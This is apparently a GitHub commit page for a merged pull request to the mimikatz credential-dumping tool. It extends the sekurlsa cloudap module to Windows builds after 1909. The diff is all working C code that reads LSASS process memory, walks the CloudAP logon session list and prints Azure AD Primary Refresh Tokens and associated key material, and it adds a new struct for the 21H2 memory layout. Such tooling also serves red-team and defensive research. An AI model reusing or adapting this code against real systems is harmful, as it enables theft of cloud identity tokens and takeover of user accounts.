Merge pull request #400 from dmb2168/master

cloudap support for versions > 1909
This commit is contained in:
Benjamin DELPY 2022-07-29 21:34:40 +02:00 committed by GitHub
commit a2271237d1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 83 additions and 25 deletions

View File

@ -29,15 +29,58 @@ NTSTATUS kuhl_m_sekurlsa_cloudap(int argc, wchar_t * argv[])
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_cloudap(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData) void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_cloudap(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{ {
KIWI_CLOUDAP_LOGON_LIST_ENTRY logon;
KIWI_CLOUDAP_CACHE_LIST_ENTRY cache; KIWI_CLOUDAP_CACHE_LIST_ENTRY cache;
KIWI_CLOUDAP_CACHE_UNK unk; KIWI_CLOUDAP_CACHE_UNK unk;
KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem}; KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, pData->cLsass->hLsassMem};
KIWI_GENERIC_PRIMARY_CREDENTIAL creds = {0}; KIWI_GENERIC_PRIMARY_CREDENTIAL creds = {0};
if(kuhl_m_sekurlsa_cloudap_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_cloudap_package.Module, CloudApReferences, ARRAYSIZE(CloudApReferences), (PVOID *) &CloudApGlobalLogonSessionList, NULL, NULL, NULL)) if(kuhl_m_sekurlsa_cloudap_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_cloudap_package.Module, CloudApReferences, ARRAYSIZE(CloudApReferences), (PVOID *) &CloudApGlobalLogonSessionList, NULL, NULL, NULL))
{ {
aLsassMemory.address = CloudApGlobalLogonSessionList; aLsassMemory.address = CloudApGlobalLogonSessionList;
if (pData->cLsass->osContext.BuildNumber > KULL_M_WIN_BUILD_10_1909)
{
KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2 logon;
KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2, LocallyUniqueIdentifier), pData->LogonId))
{
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2)))
{
if(logon.cacheEntry)
{
aLocalMemory.address = &cache;
aLsassMemory.address = logon.cacheEntry;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY)))
{
kprintf(L"\n\t Cachedir : %s", cache.toname);
if(cache.cbPRT && cache.PRT)
{
creds.UserName.Length = creds.UserName.MaximumLength = (USHORT) cache.cbPRT;
creds.UserName.Buffer = (PWSTR) cache.PRT;
}
if(cache.toDetermine)
{
aLocalMemory.address = &unk;
aLsassMemory.address = cache.toDetermine;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_UNK)))
{
kprintf(L"\n\t Key GUID : ");
kull_m_string_displayGUID(&unk.guid);
creds.Password.Length = creds.Password.MaximumLength = (USHORT) unk.unkSize;
creds.Password.Buffer = (PWSTR) unk.unk;
}
}
kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_CLOUDAP_PRT);
}
}
}
}
}
else
{
KIWI_CLOUDAP_LOGON_LIST_ENTRY logon;
KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId)) if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
{ {
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY))) if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY)))
@ -72,5 +115,6 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_cloudap(IN PKIWI_BASIC_SECURIT
} }
} }
} }
}
} else kprintf(L"KO"); } else kprintf(L"KO");
} }

View File

@ -91,3 +91,17 @@ typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_11 {
PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry; PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
// ... // ...
} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11; } KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11;
typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2 {
struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY* Flink;
struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY* Blink;
DWORD unk0;
DWORD unk1;
DWORD unk2;
LUID LocallyUniqueIdentifier;
DWORD unk3;
DWORD64 unk4;
DWORD64 unk5;
PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
// ...
} KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2, * PKIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2;